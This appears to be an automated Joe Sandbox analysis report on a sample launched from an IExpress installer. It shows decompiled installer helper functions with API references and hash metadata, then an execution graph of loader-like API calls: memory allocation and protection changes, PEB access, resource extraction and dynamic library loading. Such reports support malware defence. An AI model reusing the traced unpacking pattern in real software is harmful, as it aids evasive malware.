                            0x009447f6
                            0x00944806
                            0x00000000

                            APIs
                            • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00944E6F), ref: 009447EA
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00944823
                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00944847
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                            Strings
                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00944851
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Local$Alloc$FreeLoadMessageString
                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            • API String ID: 359063898-3699071305
                            • Opcode ID: 322af76b698df78ca43516a7aa3dc2e167b6d353f5307acaaee02c9bc020de1e
                            • Instruction ID: e260efddc3b490a3000d04854d774861a5b159e4366c59669e1aa80f9abc3aca
                            • Opcode Fuzzy Hash: 322af76b698df78ca43516a7aa3dc2e167b6d353f5307acaaee02c9bc020de1e
                            • Instruction Fuzzy Hash: C11108796086416FEB289F349C18F773B9AEBC6300F048559FA82DB741DA35DC069760
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00943680(void* __ecx) {
                            				void* _v8;
                            				struct tagMSG _v36;
                            				int _t8;
                            				struct HWND__* _t16;
                            
                            				_v8 = __ecx;
                            				_t16 = 0;
                            				while(1) {
                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                            					if(_t8 == 0) {
                            						break;
                            					}
                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                            						continue;
                            					} else {
                            						do {
                            							if(_v36.message != 0x12) {
                            								DispatchMessageA( &_v36);
                            							} else {
                            								_t16 = 1;
                            							}
                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                            						} while (_t8 != 0);
                            						if(_t16 == 0) {
                            							continue;
                            						}
                            					}
                            					break;
                            				}
                            				return _t8;
                            			}







                            0x0094368c
                            0x0094368f
                            0x00943691
                            0x0094369f
                            0x009436a7
                            0x00000000
                            0x00000000
                            0x009436ba
                            0x00000000
                            0x009436bc
                            0x009436bc
                            0x009436c0
                            0x009436cb
                            0x009436c2
                            0x009436c4
                            0x009436c4
                            0x009436da
                            0x009436e0
                            0x009436e6
                            0x00000000
                            0x00000000
                            0x009436e6
                            0x00000000
                            0x009436ba
                            0x009436ed

                            APIs
                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0094369F
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436B2
                            • DispatchMessageA.USER32(?), ref: 009436CB
                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009436DA
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                            • String ID:
                            • API String ID: 2776232527-0
                            • Opcode ID: d04113ced602530d7169853f48a424d20fb29c5a3060a48797c1d89e340c5896
                            • Instruction ID: 225123b299be7af0753af0d54f427f9c8374d88c1ca36bb16c636733925e30ac
                            • Opcode Fuzzy Hash: d04113ced602530d7169853f48a424d20fb29c5a3060a48797c1d89e340c5896
                            • Instruction Fuzzy Hash: 2F01A7769442557BDB304BB65C49EEB767CEBCAB10F014119F915E2180D561C640DA60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E00946517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                            				struct HRSRC__* _t6;
                            				void* _t21;
                            				struct HINSTANCE__* _t23;
                            				int _t24;
                            
                            				_t23 =  *0x949a3c; // 0x940000
                            				_t6 = FindResourceA(_t23, __edx, 5);
                            				if(_t6 == 0) {
                            					L6:
                            					E009444B9(0, 0x4fb, 0, 0, 0x10, 0);
                            					_t24 = _a16;
                            				} else {
                            					_t21 = LoadResource(_t23, _t6);
                            					if(_t21 == 0) {
                            						goto L6;
                            					} else {
                            						if(_a12 != 0) {
                            							_push(_a12);
                            						} else {
                            							_push(0);
                            						}
                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                            						FreeResource(_t21);
                            						if(_t24 == 0xffffffff) {
                            							goto L6;
                            						}
                            					}
                            				}
                            				return _t24;
                            			}







                            0x0094651f
                            0x0094652a
                            0x00946534
                            0x0094656b
                            0x00946577
                            0x0094657c
                            0x00946536
                            0x0094653e
                            0x00946542
                            0x00000000
                            0x00946544
                            0x00946547
                            0x0094654c
                            0x00946549
                            0x00946549
                            0x00946549
                            0x0094655e
                            0x00946560
                            0x00946569
                            0x00000000
                            0x00000000
                            0x00946569
                            0x00946542
                            0x00946587

                            APIs
                            • FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
                            • LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
                            • DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
                            • FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                            • String ID:
                            • API String ID: 1214682469-0
                            • Opcode ID: 7396fcb3b93bf7db2db4afa7d84243edac1391832954ffcdd2f044655d1d86b6
                            • Instruction ID: 423535402c02fbde77f7c20bf17c9f4c59c39a03da32754c514224d4abfe6949
                            • Opcode Fuzzy Hash: 7396fcb3b93bf7db2db4afa7d84243edac1391832954ffcdd2f044655d1d86b6
                            • Instruction Fuzzy Hash: 3501F9B3104615BBDB205FA99C48EBB7B6CEB8B761F000125FE14A3150D771DD10D7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E009465E8(char* __ecx) {
                            				char _t3;
                            				char _t10;
                            				char* _t12;
                            				char* _t14;
                            				char* _t15;
                            				CHAR* _t16;
                            
                            				_t12 = __ecx;
                            				_t15 = __ecx;
                            				_t14 =  &(__ecx[1]);
                            				_t10 = 0;
                            				do {
                            					_t3 =  *_t12;
                            					_t12 =  &(_t12[1]);
                            				} while (_t3 != 0);
                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                            				while(1) {
                            					_t16 = CharPrevA(_t15, ??);
                            					if(_t16 <= _t15) {
                            						break;
                            					}
                            					if( *_t16 == 0x5c) {
                            						L7:
                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                            							_t16 = CharNextA(_t16);
                            						}
                            						 *_t16 = _t10;
                            						_t10 = 1;
                            					} else {
                            						_push(_t16);
                            						continue;
                            					}
                            					L11:
                            					return _t10;
                            				}
                            				if( *_t16 == 0x5c) {
                            					goto L7;
                            				}
                            				goto L11;
                            			}









                            0x009465e8
                            0x009465ed
                            0x009465ef
                            0x009465f2
                            0x009465f4
                            0x009465f4
                            0x009465f6
                            0x009465f7
                            0x00946608
                            0x00946611
                            0x00946618
                            0x0094661c
                            0x00000000
                            0x00000000
                            0x0094660e
                            0x00946623
                            0x00946625
                            0x0094663b
                            0x0094663b
                            0x0094663d
                            0x00946641
                            0x00946610
                            0x00946610
                            0x00000000
                            0x00946610
                            0x00946644
                            0x00946647
                            0x00946647
                            0x00946621
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00942B33), ref: 00946602
                            • CharPrevA.USER32(?,00000000), ref: 00946612
                            • CharPrevA.USER32(?,00000000), ref: 00946629
                            • CharNextA.USER32(00000000), ref: 00946635
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Char$Prev$Next
                            • String ID:
                            • API String ID: 3260447230-0
                            • Opcode ID: b97c466ef14e42ce8225efa6a1d5224149428c30f68013f51e7b88f63d6226cf
                            • Instruction ID: 5c4a93fe327c848a6e363d503da842e30a9a2036b236fc01e1580d10f1b3d5e7
                            • Opcode Fuzzy Hash: b97c466ef14e42ce8225efa6a1d5224149428c30f68013f51e7b88f63d6226cf
                            • Instruction Fuzzy Hash: 6BF028B60081906EE7321B288C88CBBBF9CCF8B355B2A01AFE49182001D6150D469B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E009469B0() {
                            				intOrPtr* _t4;
                            				intOrPtr* _t5;
                            				void* _t6;
                            				intOrPtr _t11;
                            				intOrPtr _t12;
                            
                            				 *0x9481f8 = E00946C70();
                            				__set_app_type(E00946FBE(2));
                            				 *0x9488a4 =  *0x9488a4 | 0xffffffff;
                            				 *0x9488a8 =  *0x9488a8 | 0xffffffff;
                            				_t4 = __p__fmode();
                            				_t11 =  *0x948528; // 0x0
                            				 *_t4 = _t11;
                            				_t5 = __p__commode();
                            				_t12 =  *0x94851c; // 0x0
                            				 *_t5 = _t12;
                            				_t6 = E00947000();
                            				if( *0x948000 == 0) {
                            					__setusermatherr(E00947000);
                            				}
                            				E009471EF(_t6);
                            				return 0;
                            			}








                            0x009469b7
                            0x009469c2
                            0x009469c8
                            0x009469cf
                            0x009469d8
                            0x009469de
                            0x009469e4
                            0x009469e6
                            0x009469ec
                            0x009469f2
                            0x009469f4
                            0x00946a00
                            0x00946a07
                            0x00946a0d
                            0x00946a0e
                            0x00946a15

                            APIs
                              • Part of subcall function 00946FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00946FC5
                            • __set_app_type.MSVCRT ref: 009469C2
                            • __p__fmode.MSVCRT ref: 009469D8
                            • __p__commode.MSVCRT ref: 009469E6
                            • __setusermatherr.MSVCRT ref: 00946A07
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                            • String ID:
                            • API String ID: 1632413811-0
                            • Opcode ID: f7b11268a53a16159b32b135e989d07524527dbda8f805cfbaa150da90c97244
                            • Instruction ID: 2c0f497e831c797021614b83a2ba864b0e5abe7d873fec7e126219b09cd86c66
                            • Opcode Fuzzy Hash: f7b11268a53a16159b32b135e989d07524527dbda8f805cfbaa150da90c97244
                            • Instruction Fuzzy Hash: B8F0F8B856D7059FD718AF70BD0AE0A7B61FB87329B100649E461862F0CF7A8544BA11
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:29.5%
                            Signature Coverage:14.3%
                            Total number of Nodes:349
                            Total number of Limit Nodes:37
                            execution_graph 24285 857000 24286 85700e 24285->24286 24289 857bb6 24286->24289 24290 857bc5 24289->24290 24293 858356 24290->24293 24296 858371 24293->24296 24294 85837a CreateToolhelp32Snapshot 24295 858396 Module32First 24294->24295 24294->24296 24297 8583a5 24295->24297 24298 857bb5 24295->24298 24296->24294 24296->24295 24300 858015 24297->24300 24301 858040 24300->24301 24302 858051 VirtualAlloc 24301->24302 24303 858089 24301->24303 24302->24303 24303->24303 24304 660920 TerminateProcess 24305 66003c 24306 660049 24305->24306 24320 660e0f SetErrorMode SetErrorMode 24306->24320 24311 660265 24312 6602ce VirtualProtect 24311->24312 24314 66030b 24312->24314 24313 660439 VirtualFree 24318 6605f4 LoadLibraryA 24313->24318 24319 6604be 24313->24319 24314->24313 24315 6604e3 LoadLibraryA 24315->24319 24317 6608c7 24318->24317 24319->24315 24319->24318 24321 660223 24320->24321 24322 660d90 24321->24322 24323 660dad 24322->24323 24324 660dbb GetPEB 24323->24324 24325 660238 VirtualAlloc 24323->24325 24324->24325 24325->24311 24326 40cbdd 24327 40cbe9 __close 24326->24327 24361 40d534 HeapCreate 24327->24361 24330 40cc46 24363 41087e GetModuleHandleW 24330->24363 24334 40cc57 __RTC_Initialize 24397 411a15 24334->24397 24337 40cc66 24338 40cc72 GetCommandLineA 24337->24338 24528 40e79a 63 API calls 3 library calls 24337->24528 24412 412892 24338->24412 24342 40cc71 24342->24338 24345 40cc97 24448 41255f 24345->24448 24349 40cca8 24463 40e859 24349->24463 24352 40ccb0 24353 40ccbb 24352->24353 24531 40e79a 63 API calls 3 library calls 24352->24531 24469 4019f0 OleInitialize 24353->24469 24356 40ccd8 24357 40ccea 24356->24357 24523 40ea0a 24356->24523 24532 40ea36 63 API calls _doexit 24357->24532 24360 40ccef __close 24362 40cc3a 24361->24362 24362->24330 24526 40cbb4 63 API calls 3 library calls 24362->24526 24364 410892 24363->24364 24365 410899 24363->24365 24533 40e76a Sleep GetModuleHandleW 24364->24533 24367 410a01 24365->24367 24368 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 24365->24368 24555 410598 7 API calls __decode_pointer 24367->24555 24373 4108ec TlsAlloc 24368->24373 24370 410898 24370->24365 24372 40cc4c 24372->24334 24527 40cbb4 63 API calls 3 library calls 24372->24527 24373->24372 24374 41093a TlsSetValue 24373->24374 24374->24372 24375 41094b 24374->24375 24534 40ea54 6 API calls 4 library calls 24375->24534 24377 410950 24535 41046e TlsGetValue 24377->24535 24380 41046e __encode_pointer 6 API calls 24381 41096b 24380->24381 24382 41046e __encode_pointer 6 API calls 24381->24382 24383 41097b 24382->24383 24384 41046e __encode_pointer 6 API calls 24383->24384 24385 41098b 24384->24385 24545 40d564 InitializeCriticalSectionAndSpinCount ___lock_fhandle 24385->24545 24387 410998 24387->24367 24546 4104e9 6 API calls __crt_waiting_on_module_handle 24387->24546 24389 4109ac 24389->24367 24547 411cba 24389->24547 24393 4109df 24393->24367 24394 4109e6 24393->24394 24554 4105d5 63 API calls 5 library calls 24394->24554 24396 4109ee GetCurrentThreadId 24396->24372 24584 40e1d8 24397->24584 24399 411a21 GetStartupInfoA 24400 411cba __calloc_crt 63 API calls 24399->24400 24406 411a42 24400->24406 24401 411c60 __close 24401->24337 24402 411bdd GetStdHandle 24411 411ba7 24402->24411 24403 411c42 SetHandleCount 24403->24401 24404 411cba __calloc_crt 63 API calls 24404->24406 24405 411bef GetFileType 24405->24411 24406->24401 24406->24404 24408 411b2a 24406->24408 24406->24411 24407 411b53 GetFileType 24407->24408 24408->24401 24408->24407 24408->24411 24585 41389c InitializeCriticalSectionAndSpinCount __close 24408->24585 24411->24401 24411->24402 24411->24403 24411->24405 24586 41389c InitializeCriticalSectionAndSpinCount __close 24411->24586 24413 4128b0 GetEnvironmentStringsW 24412->24413 24414 4128cf 24412->24414 24415 4128c4 GetLastError 24413->24415 24416 4128b8 24413->24416 24414->24416 24417 412968 24414->24417 24415->24414 24418 4128eb GetEnvironmentStringsW 24416->24418 24419 4128fa WideCharToMultiByte 24416->24419 24420 412971 GetEnvironmentStrings 24417->24420 24421 40cc82 24417->24421 24418->24419 24418->24421 24424 41295d FreeEnvironmentStringsW 24419->24424 24425 41292e 24419->24425 24420->24421 24422 412981 24420->24422 24437 4127d7 24421->24437 24426 411c75 __malloc_crt 63 API calls 24422->24426 24424->24421 24587 411c75 24425->24587 24429 41299b 24426->24429 24430 4129a2 FreeEnvironmentStringsA 24429->24430 24431 4129ae ___crtGetEnvironmentStringsA 24429->24431 24430->24421 24434 4129b8 FreeEnvironmentStringsA 24431->24434 24432 41293c WideCharToMultiByte 24433 41294e 24432->24433 24436 412956 24432->24436 24593 40b6b5 63 API calls __close 24433->24593 24434->24421 24436->24424 24438 4127f1 GetModuleFileNameA 24437->24438 24439 4127ec 24437->24439 24441 412818 24438->24441 24633 41446b 107 API calls __setmbcp 24439->24633 24627 41263d 24441->24627 24443 40cc8c 24443->24345 24529 40e79a 63 API calls 3 library calls 24443->24529 24445 411c75 __malloc_crt 63 API calls 24446 41285a 24445->24446 24446->24443 24447 41263d _parse_cmdline 73 API calls 24446->24447 24447->24443 24449 412568 24448->24449 24451 41256d _strlen 24448->24451 24635 41446b 107 API calls __setmbcp 24449->24635 24452 411cba __calloc_crt 63 API calls 24451->24452 24456 40cc9d 24451->24456 24453 4125a2 _strlen 24452->24453 24454 412600 24453->24454 24453->24456 24457 411cba __calloc_crt 63 API calls 24453->24457 24458 412626 24453->24458 24461 4125e7 24453->24461 24636 40ef42 63 API calls __close 24453->24636 24638 40b6b5 63 API calls __close 24454->24638 24456->24349 24530 40e79a 63 API calls 3 library calls 24456->24530 24457->24453 24639 40b6b5 63 API calls __close 24458->24639 24461->24453 24637 40e61c 10 API calls 3 library calls 24461->24637 24464 40e867 __IsNonwritableInCurrentImage 24463->24464 24640 413586 24464->24640 24466 40e885 __initterm_e 24468 40e8a4 __IsNonwritableInCurrentImage __initterm 24466->24468 24644 40d2bd 74 API calls __cinit 24466->24644 24468->24352 24470 401ab9 24469->24470 24645 40b99e 24470->24645 24472 401abf 24473 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 24472->24473 24503 402467 24472->24503 24474 401dc3 FindCloseChangeNotification GetModuleHandleA 24473->24474 24481 401c55 24473->24481 24658 401650 24474->24658 24476 401e8b FindResourceA LoadResource LockResource SizeofResource 24477 40b84d _malloc 63 API calls 24476->24477 24478 401ebf 24477->24478 24660 40af66 24478->24660 24480 401c9c CloseHandle 24480->24356 24481->24480 24486 401cf9 Module32Next 24481->24486 24482 401ecb _memset 24483 401efc SizeofResource 24482->24483 24484 401f1c 24483->24484 24485 401f5f 24483->24485 24484->24485 24698 401560 __VEC_memcpy ___sbh_free_block 24484->24698 24488 401f92 _memset 24485->24488 24699 401560 __VEC_memcpy ___sbh_free_block 24485->24699 24486->24474 24495 401d0f 24486->24495 24490 401fa2 FreeResource 24488->24490 24491 40b84d _malloc 63 API calls 24490->24491 24492 401fbb SizeofResource 24491->24492 24493 401fe5 _memset 24492->24493 24494 4020aa LoadLibraryA 24493->24494 24496 401650 24494->24496 24495->24480 24498 401dad Module32Next 24495->24498 24497 40216c GetProcAddress 24496->24497 24499 4021aa 24497->24499 24497->24503 24498->24474 24498->24495 24499->24503 24672 4018f0 24499->24672 24501 40243f 24501->24503 24700 40b6b5 63 API calls __close 24501->24700 24503->24356 24504 4021f1 24504->24501 24684 401870 24504->24684 24506 402269 VariantInit 24507 401870 76 API calls 24506->24507 24508 40228b VariantInit 24507->24508 24509 4022a7 24508->24509 24510 4022d9 SafeArrayCreate SafeArrayAccessData 24509->24510 24689 40b350 24510->24689 24513 40232c 24514 402354 SafeArrayDestroy 24513->24514 24515 40235b 24513->24515 24514->24515 24516 402392 SafeArrayCreateVector 24515->24516 24517 4023a4 24516->24517 24518 4023bc VariantClear VariantClear 24517->24518 24691 4019a0 24518->24691 24521 40242e 24522 4019a0 66 API calls 24521->24522 24522->24501 24722 40e8de 24523->24722 24525 40ea1b 24525->24357 24526->24330 24527->24334 24528->24342 24529->24345 24530->24349 24531->24353 24532->24360 24533->24370 24534->24377 24536 4104a7 GetModuleHandleW 24535->24536 24537 410486 24535->24537 24539 4104c2 GetProcAddress 24536->24539 24540 4104b7 24536->24540 24537->24536 24538 410490 TlsGetValue 24537->24538 24542 41049b 24538->24542 24544 41049f 24539->24544 24556 40e76a Sleep GetModuleHandleW 24540->24556 24542->24536 24542->24544 24543 4104bd 24543->24539 24543->24544 24544->24380 24545->24387 24546->24389 24550 411cc3 24547->24550 24549 4109c5 24549->24367 24553 4104e9 6 API calls __crt_waiting_on_module_handle 24549->24553 24550->24549 24551 411ce1 Sleep 24550->24551 24557 40e231 24550->24557 24552 411cf6 24551->24552 24552->24549 24552->24550 24553->24393 24554->24396 24556->24543 24558 40e23d __close 24557->24558 24559 40e255 24558->24559 24567 40e274 _memset 24558->24567 24570 40bfc1 63 API calls __getptd_noexit 24559->24570 24561 40e25a 24571 40e744 6 API calls 2 library calls 24561->24571 24562 40e26a __close 24562->24550 24564 40e2e6 RtlAllocateHeap 24564->24567 24567->24562 24567->24564 24572 40d6e0 24567->24572 24579 40def2 5 API calls 2 library calls 24567->24579 24580 40e32d LeaveCriticalSection _doexit 24567->24580 24581 40d2e3 6 API calls __decode_pointer 24567->24581 24570->24561 24573 40d6f5 24572->24573 24574 40d708 EnterCriticalSection 24572->24574 24582 40d61d 63 API calls 9 library calls 24573->24582 24574->24567 24576 40d6fb 24576->24574 24583 40e79a 63 API calls 3 library calls 24576->24583 24578 40d707 24578->24574 24579->24567 24580->24567 24581->24567 24582->24576 24583->24578 24584->24399 24585->24408 24586->24411 24590 411c7e 24587->24590 24589 411cb4 24589->24424 24589->24432 24590->24589 24591 411c95 Sleep 24590->24591 24594 40b84d 24590->24594 24592 411caa 24591->24592 24592->24589 24592->24590 24593->24436 24595 40b900 24594->24595 24605 40b85f 24594->24605 24621 40d2e3 6 API calls __decode_pointer 24595->24621 24597 40b906 24622 40bfc1 63 API calls __getptd_noexit 24597->24622 24602 40b8bc RtlAllocateHeap 24602->24605 24603 40b870 24603->24605 24612 40ec4d 63 API calls 2 library calls 24603->24612 24613 40eaa2 63 API calls 7 library calls 24603->24613 24614 40e7ee 24603->24614 24605->24602 24605->24603 24606 40b8ec 24605->24606 24609 40b8f1 24605->24609 24611 40b8f8 24605->24611 24617 40b7fe 63 API calls 4 library calls 24605->24617 24618 40d2e3 6 API calls __decode_pointer 24605->24618 24619 40bfc1 63 API calls __getptd_noexit 24606->24619 24620 40bfc1 63 API calls __getptd_noexit 24609->24620 24611->24590 24612->24603 24613->24603 24623 40e7c3 GetModuleHandleW 24614->24623 24617->24605 24618->24605 24619->24609 24620->24611 24621->24597 24622->24611 24624 40e7d7 GetProcAddress 24623->24624 24625 40e7ec ExitProcess 24623->24625 24624->24625 24626 40e7e7 CorExitProcess 24624->24626 24626->24625 24629 41265c 24627->24629 24631 4126c9 24629->24631 24634 416836 73 API calls x_ismbbtype_l 24629->24634 24630 4127c7 24630->24443 24630->24445 24631->24630 24632 416836 73 API calls _parse_cmdline 24631->24632 24632->24631 24633->24438 24634->24629 24635->24451 24636->24453 24637->24461 24638->24456 24639->24456 24641 41358c 24640->24641 24642 41046e __encode_pointer 6 API calls 24641->24642 24643 4135a4 24641->24643 24642->24641 24643->24466 24644->24468 24648 40b9aa __close _strnlen 24645->24648 24646 40b9b8 24701 40bfc1 63 API calls __getptd_noexit 24646->24701 24648->24646 24651 40b9ec 24648->24651 24649 40b9bd 24702 40e744 6 API calls 2 library calls 24649->24702 24652 40d6e0 __lock 63 API calls 24651->24652 24654 40b9f3 24652->24654 24653 40b9cd __close 24653->24472 24703 40b917 121 API calls 3 library calls 24654->24703 24656 40b9ff 24704 40ba18 LeaveCriticalSection _doexit 24656->24704 24659 4017cc ___crtGetEnvironmentStringsA 24658->24659 24659->24476 24662 40af70 24660->24662 24661 40b84d _malloc 63 API calls 24661->24662 24662->24661 24663 40af8a 24662->24663 24665 40af8c std::bad_alloc::bad_alloc 24662->24665 24705 40d2e3 6 API calls __decode_pointer 24662->24705 24663->24482 24670 40afb2 24665->24670 24706 40d2bd 74 API calls __cinit 24665->24706 24667 40afbc 24708 40cd39 RaiseException 24667->24708 24707 40af49 63 API calls std::exception::exception 24670->24707 24671 40afca 24673 401903 lstrlenA 24672->24673 24674 4018fc 24672->24674 24709 4017e0 24673->24709 24674->24504 24677 401940 GetLastError 24679 40194b MultiByteToWideChar 24677->24679 24680 40198d 24677->24680 24678 401996 24678->24504 24681 4017e0 73 API calls 24679->24681 24680->24678 24717 401030 GetLastError 24680->24717 24683 401970 MultiByteToWideChar 24681->24683 24683->24680 24685 40af66 75 API calls 24684->24685 24686 40187c 24685->24686 24687 401885 SysAllocString 24686->24687 24688 4018a4 24686->24688 24687->24688 24688->24506 24690 40231a SafeArrayUnaccessData 24689->24690 24690->24513 24692 4019aa InterlockedDecrement 24691->24692 24696 4019df VariantClear 24691->24696 24693 4019b8 24692->24693 24692->24696 24694 4019c2 SysFreeString 24693->24694 24693->24696 24697 4019c9 24693->24697 24694->24697 24696->24521 24721 40aec0 64 API calls __close 24697->24721 24698->24484 24699->24488 24700->24503 24701->24649 24703->24656 24704->24653 24705->24662 24706->24670 24707->24667 24708->24671 24710 4017e9 24709->24710 24715 401844 24710->24715 24716 40182d 24710->24716 24718 40b783 73 API calls 4 library calls 24710->24718 24714 40186d MultiByteToWideChar 24714->24677 24714->24678 24715->24714 24720 40b743 63 API calls 2 library calls 24715->24720 24716->24715 24719 40b6b5 63 API calls __close 24716->24719 24718->24716 24719->24715 24720->24715 24721->24696 24723 40e8ea __close 24722->24723 24724 40d6e0 __lock 63 API calls 24723->24724 24725 40e8f1 24724->24725 24726 40e9ba __initterm 24725->24726 24727 40e91d 24725->24727 24741 40e9f5 24726->24741 24746 4104e9 6 API calls __crt_waiting_on_module_handle 24727->24746 24731 40e928 24733 40e9aa __initterm 24731->24733 24747 4104e9 6 API calls __crt_waiting_on_module_handle 24731->24747 24732 40e9f2 __close 24732->24525 24733->24726 24736 40e9e9 24737 40e7ee _doexit 4 API calls 24736->24737 24737->24732 24738 4104e0 6 API calls _doexit 24740 40e93d 24738->24740 24739 4104e9 6 API calls __decode_pointer 24739->24740 24740->24733 24740->24738 24740->24739 24742 40e9fb 24741->24742 24744 40e9d6 24741->24744 24748 40d606 LeaveCriticalSection 24742->24748 24744->24732 24745 40d606 LeaveCriticalSection 24744->24745 24745->24736 24746->24731 24747->24740 24748->24744 24749 66092b GetPEB 24750 660972 24749->24750

                            Control-flow Graph

                            • Executed
                            • Not Executed
